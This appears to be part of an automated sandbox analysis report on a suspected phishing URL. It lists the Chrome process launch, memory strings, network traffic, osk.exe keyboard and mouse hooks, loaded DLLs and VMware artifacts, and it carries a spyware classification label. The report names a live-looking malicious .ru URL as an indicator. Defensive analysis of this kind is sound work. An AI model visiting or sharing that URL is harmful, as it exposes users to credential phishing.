Source: chrome.exe, 00000000.00000002.2446869327.000018A800714000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2444217413.000018A80062C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2441093852.000018A8004F4000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2444506665.000018A800648000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/
Source: chrome.exe, 00000000.00000002.2452562161.000018A800944000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2448870209.000018A8007E0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/chrome/tips/
Source: chrome.exe, 00000000.00000002.2452562161.000018A800944000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2448870209.000018A8007E0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/chrome/tips/gs
Source: chrome.exe, 00000000.00000002.2453200711.000018A800980000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/dl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjhkYWYwZDctOTExOS00MGQ5LTg
Source: chrome.exe, 00000000.00000002.2440596477.000018A8004C8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/dl/release2/chrome_component/AMpg5-cnrANo_2018.8.8.0/2018.8.8.0_win64_win_thi
Source: chrome.exe, 00000000.00000002.2452562161.000018A800944000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/dl/release2/chrome_component/V3P1l2hLvLw_7/7_all_sslErrorAssistant.crx3
Source: chrome.exe, 00000000.00000002.2433095021.000018A800120000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/dl/release2/chrome_component/ac6mhlwypzipnufijdvfyhdgvt4q_67/khaoiebndkojlmpp
Source: chrome.exe, 00000000.00000002.2453200711.000018A800980000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/dl/release2/chrome_component/acaldksiunzh56452py2db5mnbpa_120.0.6050.0/jamhcn
Source: chrome.exe, 00000000.00000002.2453200711.000018A800980000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/dl/release2/chrome_component/acccxbt6wwsvpxzpob4hojndwkqq_4.10.2830.0/oimompe
Source: chrome.exe, 00000000.00000002.2453200711.000018A800980000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/dl/release2/chrome_component/adm5fg7myczym5ugfpmw2lireirq_2024.11.8.0/gonpemd
Source: chrome.exe, 00000000.00000002.2465254973.000018A800E68000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/dl/release2/chrome_component/adrga7eefaxjfdmmgfkiaxjg4yjq_2024.7.12.235938/ee
Source: chrome.exe, 00000000.00000002.2453200711.000018A800980000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/dl/release2/chrome_component/ads7ltfl2gw6hxwgakn3sxrkoijq_9.53.0/gcmjkmgdlgnk
Source: chrome.exe, 00000000.00000002.2465254973.000018A800E68000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/dl/release2/chrome_component/cpx7rw4q3nwu7emczqf2w6cu7y_2023.3.30.1305/cocnca
Source: chrome.exe, 00000000.00000002.2453200711.000018A800980000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/dl/release2/chrome_component/fw4ggtylvtq6i65ti33m4vqijm_2024.12.14.1/kiabhabj
Source: chrome.exe, 00000000.00000002.2455592885.000018A800A74000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/dl/release2/chrome_component/gxfxw5tpagw5sjcjp5n3fng72a_2024.12.19.1218/ggkke
Source: chrome.exe, 00000000.00000002.2453200711.000018A800980000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/dl/release2/chrome_component/imoffpf67hel7kbknqflao2oo4_1.0.2738.0/neifaoindg
Source: chrome.exe, 00000000.00000002.2433095021.000018A800120000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/dl/release2/chrome_component/j2hxfei2occ5siitujtlwgp6xi_3/ojhpjlocmbogdgmfpkh
Source: chrome.exe, 00000000.00000002.2434125267.000018A800194000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/dl/release2/chrome_component/jm2vv64bmurl43xhnpox2jvj2u_20250106.714261381.14
Source: chrome.exe, 00000000.00000002.2433095021.000018A800120000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/dl/release2/chrome_component/mqzl6d3v6pxw2pldxqlw6axmya_9483/hfnkpimlhhgieadd
Source: chrome.exe, 00000000.00000002.2457523440.000018A800B20000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2442854177.000018A8005A4000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2441093852.000018A8004F4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: chrome.exe, 00000000.00000002.2442854177.000018A8005A4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.icoenterInsightsex
Source: chrome.exe, 00000000.00000002.2437206743.000018A800338000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/tools/feedback/chrome/__submit
Source: chrome.exe, 00000000.00000002.2430477894.000018A80000C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/
Source: chrome.exe, 00000000.00000002.2435314035.000018A80020C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/oauth2/v1/userinfo
Source: chrome.exe, 00000000.00000002.2435314035.000018A80020C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/oauth2/v2/tokeninfo
Source: chrome.exe, 00000000.00000002.2435314035.000018A80020C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/oauth2/v4/token
Source: chrome.exe, 00000000.00000002.2435314035.000018A80020C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/reauth/v1beta/users/
Source: chrome.exe, 00000000.00000002.2440596477.000018A8004C8000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2461431773.000018A800C70000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/chrome/intelligence/assist/ranker/models/translate/2017/03/translate_ranker_
Source: chrome.exe, 00000000.00000002.2447559603.000018A800758000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2465755079.000018A800EA8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/
Source: chrome.exe, 00000000.00000002.2476540239.000018A801E0C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/login#
Source: chrome.exe, 00000000.00000002.2474452106.000018A801ADC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/login#com/
Source: chrome.exe, 00000000.00000002.2459717081.000018A800BD8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/login#l
Source: chrome.exe, 00000000.00000002.2459717081.000018A800BD8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/login#m
Source: chrome.exe, 00000000.00000002.2475284099.000018A801C0C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/login#ne.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1
Source: chrome.exe, 00000000.00000002.2459717081.000018A800BD8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/login#o
Source: chrome.exe, 00000000.00000002.2474452106.000018A801ADC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/
Source: chrome.exe, 00000000.00000002.2448086785.000018A80078D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/:
Source: chrome.exe, 00000000.00000002.2448086785.000018A80078D000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2474760399.000018A801B1C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2445223137.000018A800678000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/?feature=ytca
Source: chrome.exe, 00000000.00000002.2474760399.000018A801B1C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/?feature=ytcaogl
Source: chrome.exe, 00000000.00000002.2448086785.000018A80078D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/J
Source: chrome.exe, 00000000.00000002.2474823543.000018A801B2C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2432295544.000018A8000CC000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2448086785.000018A80078D000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2436911541.000018A8002D0000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2462302280.000018A800CB8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/s/notifications/manifest/cr_install.html
Source: chrome.exe, 00000000.00000002.2474823543.000018A801B2C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/s/notifications/manifest/cr_install.htmllt
Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49786
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49857
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49703 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49843
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49840
Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49678 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49840 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49857 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49843 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49786 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49703
Source: unknownHTTPS traffic detected: 20.17.11.191:443 -> 192.168.2.16:49840 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

barindex
Source: C:\Windows\System32\osk.exeWindows user hook set: Path: unknown Event Start:focus Event End: focus Module: NULLJump to behavior
Source: C:\Windows\System32\osk.exeWindows user hook set: 0 keyboard low level C:\Windows\system32\osk.exeJump to behavior
Source: C:\Windows\System32\osk.exeWindows user hook set: 4576 call wnd proc C:\Windows\System32\uiautomationcore.dllJump to behavior
Source: C:\Windows\System32\osk.exeWindows user hook set: 4576 get message C:\Windows\System32\uiautomationcore.dllJump to behavior
Source: C:\Windows\System32\osk.exeWindows user hook set: 0 shell C:\Windows\system32\OskSupport.dllJump to behavior
Source: C:\Windows\System32\osk.exeWindows user hook set: 0 mouse low level C:\Windows\system32\osk.exeJump to behavior
Source: C:\Windows\System32\osk.exeWindows user hook set: 0 keyboard low level C:\Windows\system32\osk.exeJump to behavior
Source: C:\Windows\System32\osk.exeWindows user hook set: 3736 call wnd proc C:\Windows\System32\uiautomationcore.dllJump to behavior
Source: C:\Windows\System32\osk.exeWindows user hook set: 3736 get message C:\Windows\System32\uiautomationcore.dllJump to behavior
Source: C:\Windows\System32\osk.exeWindows user hook set: 3736 call wnd proc C:\Windows\System32\uiautomationcore.dllJump to behavior
Source: C:\Windows\System32\osk.exeWindows user hook set: 3736 get message C:\Windows\System32\uiautomationcore.dllJump to behavior
Source: C:\Windows\System32\osk.exeWindows user hook set: 3736 call wnd proc C:\Windows\System32\uiautomationcore.dllJump to behavior
Source: C:\Windows\System32\osk.exeWindows user hook set: 3736 get message C:\Windows\System32\uiautomationcore.dllJump to behavior
Source: C:\Windows\System32\osk.exeWindows user hook set: 3736 call wnd proc C:\Windows\System32\uiautomationcore.dllJump to behavior
Source: C:\Windows\System32\osk.exeWindows user hook set: 3736 get message C:\Windows\System32\uiautomationcore.dllJump to behavior
Source: C:\Windows\System32\osk.exeWindows user hook set: 0 mouse low level C:\Windows\system32\osk.exeJump to behavior
Source: classification engineClassification label: mal72.spyw.win@24/75@34/14
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome AppsJump to behavior
Source: C:\Windows\System32\osk.exeMutant created: \Sessions\1\BaseNamedObjects\OSKRunning
Source: C:\Windows\explorer.exeFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Windows\System32\rundll32.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: unknownProcess created: C:\Windows\System32\rundll32.exe "C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,Control_RunDLL C:\Windows\System32\main.cpl,@1 ,
Source: chrome.exe, 00000000.00000002.2443586016.000018A8005F6000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: CREATE TABLE psl_extensions (domain VARCHAR NOT NULL, UNIQUE (domain));
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2164 --field-trial-handle=1960,i,12798820108584300126,5385190659516403337,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://6y.tickarmoz.ru/aY57/"
Source: unknownProcess created: C:\Windows\System32\rundll32.exe "C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,Control_RunDLL C:\Windows\System32\main.cpl,@1 ,
Source: unknownProcess created: C:\Windows\System32\osk.exe "C:\Windows\system32\osk.exe"
Source: unknownProcess created: C:\Windows\System32\osk.exe "C:\Windows\system32\osk.exe"
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2164 --field-trial-handle=1960,i,12798820108584300126,5385190659516403337,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\osk.exeSection loaded: osksupport.dllJump to behavior
Source: C:\Windows\System32\osk.exeSection loaded: dwmapi.dllJump to behavior
Source: C:\Windows\System32\osk.exeSection loaded: oleacc.dllJump to behavior
Source: C:\Windows\System32\osk.exeSection loaded: winmm.dllJump to behavior
Source: C:\Windows\System32\osk.exeSection loaded: wmsgapi.dllJump to behavior
Source: C:\Windows\System32\osk.exeSection loaded: duser.dllJump to behavior
Source: C:\Windows\System32\osk.exeSection loaded: dui70.dllJump to behavior
Source: C:\Windows\System32\osk.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\osk.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\osk.exeSection loaded: winmmbase.dllJump to behavior
Source: C:\Windows\System32\osk.exeSection loaded: mmdevapi.dllJump to behavior
Source: C:\Windows\System32\osk.exeSection loaded: devobj.dllJump to behavior
Source: C:\Windows\System32\osk.exeSection loaded: ksuser.dllJump to behavior
Source: C:\Windows\System32\osk.exeSection loaded: avrt.dllJump to behavior
Source: C:\Windows\System32\osk.exeSection loaded: audioses.dllJump to behavior
Source: C:\Windows\System32\osk.exeSection loaded: powrprof.dllJump to behavior
Source: C:\Windows\System32\osk.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Windows\System32\osk.exeSection loaded: msacm32.dllJump to behavior
Source: C:\Windows\System32\osk.exeSection loaded: midimap.dllJump to behavior
Source: C:\Windows\System32\osk.exeSection loaded: textshaping.dllJump to behavior
Source: C:\Windows\System32\osk.exeSection loaded: textinputframework.dllJump to behavior
Source: C:\Windows\System32\osk.exeSection loaded: coreuicomponents.dllJump to behavior
Source: C:\Windows\System32\osk.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Windows\System32\osk.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\System32\osk.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\osk.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\osk.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\osk.exeSection loaded: twinapi.dllJump to behavior
Source: C:\Windows\System32\osk.exeSection loaded: xmllite.dllJump to behavior
Source: C:\Windows\System32\osk.exeSection loaded: hid.dllJump to behavior
Source: C:\Windows\System32\osk.exeSection loaded: mstextprediction.dllJump to behavior
Source: C:\Windows\System32\osk.exeSection loaded: policymanager.dllJump to behavior
Source: C:\Windows\System32\osk.exeSection loaded: msvcp110_win.dllJump to behavior
Source: C:\Windows\System32\osk.exeSection loaded: uiautomationcore.dllJump to behavior
Source: C:\Windows\System32\osk.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\osk.exeSection loaded: sxs.dllJump to behavior
Source: C:\Windows\System32\osk.exeSection loaded: uiamanager.dllJump to behavior
Source: C:\Windows\System32\osk.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Windows\System32\osk.exeSection loaded: dwrite.dllJump to behavior
Source: C:\Windows\System32\osk.exeSection loaded: windowscodecs.dllJump to behavior
Source: C:\Windows\System32\osk.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\osk.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\osk.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\System32\osk.exeSection loaded: actxprxy.dllJump to behavior
Source: C:\Windows\System32\osk.exeSection loaded: atlthunk.dllJump to behavior
Source: C:\Windows\System32\osk.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: windows.cloudstore.schema.shell.dllJump to behavior
Source: C:\Windows\System32\osk.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{29CE1D46-B481-4AA0-A08A-D3EBC8ACA402}\InProcServer32Jump to behavior
Source: Google Drive.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: YouTube.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Sheets.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Gmail.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Slides.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Docs.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: C:\Windows\System32\rundll32.exeWindow found: window name: SysTabControl32Jump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Windows\System32\osk.exeWindow detected: Number of UI elements: 16
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome AppsJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnkJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\osk.exeWindow / User API: threadDelayed 1011Jump to behavior
Source: chrome.exe, 00000000.00000002.2431028082.000018A80004C000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware
Source: explorer.exe, 00000014.00000002.2429507349.00000000089F4000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000T
Source: chrome.exe, 00000000.00000002.2440375280.000018A8004B4000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware Virtual USB Mouse
Source: explorer.exe, 00000014.00000002.2415018046.0000000007206000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}W6
Source: chrome.exe, 00000000.00000002.2463631846.000018A800DE8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: USB device added: path=\\?\usb#vid_0e0f&pid_0003#5&2dda038&0&5#{a5dcbf10-6530-11d2-901f-00c04fb951ed} vendor=3599 "VMware", product=3 "VMware Virtual USB Mouse", serial="", driver="usbccgp", guid=d4177a51-46a5-41ba-aa47-ce0e156b64ff
Source: explorer.exe, 00000014.00000002.2429507349.0000000008909000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: NXTcaVMWare
Source: explorer.exe, 00000014.00000000.2022540069.0000000008888000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000nf
Source: explorer.exe, 00000014.00000000.2022540069.0000000008770000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.2429507349.000000000879C000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWUSm32\DriverStore\en-US\usb.inf_locK
Source: explorer.exe, 00000014.00000002.2429507349.0000000008A54000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware SATA CD00lT8
Source: explorer.exe, 00000014.00000000.2008084492.0000000000B14000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: #CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000014.00000000.2022540069.0000000008888000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: NECVMWar VMware SATA CD00
